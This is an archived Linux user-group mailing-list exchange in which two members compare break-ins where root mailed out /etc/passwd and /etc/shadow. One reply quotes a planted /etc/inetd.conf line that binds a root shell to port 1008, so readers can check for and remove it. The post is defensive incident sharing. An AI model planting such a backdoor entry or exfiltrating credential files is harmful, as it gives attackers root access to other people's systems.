Hi,
This occurred to me as well last night - I think around 3am. Similarly, it
was discovered because the mail destination domain could not be found.
However, I think this is because somewhere in teh process of getting in,
they broke my local named (i wasnt working in the morning) - that or
somewhere upstream someone hurt DNS - I was getting a lot of "Lame server
errors". The email contained the output of ifconfig and the contents of
/etc/passwd and /etc/shadow.
The ISP I was on was Telstra bigpond - if its the same, maybe they were
scanning that range of addresses.
The other change I found was the following entry on the end of
/etc/inetd.conf:
1008 stream tcp nowait root /bin/sh sh
which you may want to check for and remove/comment.
I am thinking it could have been the BIND exploit coming active, but not
sure (I havent upgraded yet, and my listen-on clause was broken - now fixed
not to listen outside).
The fact taht they edited /etc/inetd.conf and cat-d shadow indicates root
priveleges. However, there doesnt seem to be any evidence of things inside
or other changes, so possibly a buffer of exploit type deal?
I run RH6.2 btw :)
The only services i had running out of inetd were ftp, telnet and auth
(first 2 are shut down until i get home to tighten things) - not portmap.
Makes you wonder if one should send an edited email with prepared IP and
ready a box to trace what happens :)
- Simon
>Last night I experienced a security breach. I run a small lan with a
>ppp dial-up connection that is often left connected. It seems that at
>11pm an email containing the output of ifconfig and the contents of
>the passwd files was sent by root to [EMAIL PROTECTED] Luckily the mail
>was bounced by our ISP (thanks to the lan's domain name not being found
>by the ISP's DNS).
>Scouring the log files, the only evidence of this breach I can file
>is the log of the attempted mail send in /var/log/maillog and the following
>suspicious entry in /var/log/messages:
>Feb 28 01:53:07 emu portmap[12152]: connect from 202.157.133.184 to
>getport(status): request from unauthorized host
>This is the only portmap log I've ever had.
>Has anyone come across something similar? I've no idea whether this is
>the result of a trojan, or whether someone managed to gain access to
>my machine (although if they did gain root access, why mail out a passwd
>file?). Any thoughts?Sean.
--
Simon Bowden
Tech Support, School of Economics, UNSW
3rd Year Computer Engineering Student, UNSW
Mobile: 0414 937 375
email: [EMAIL PROTECTED]
--
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://slug.org.au/lists/listinfo/slug
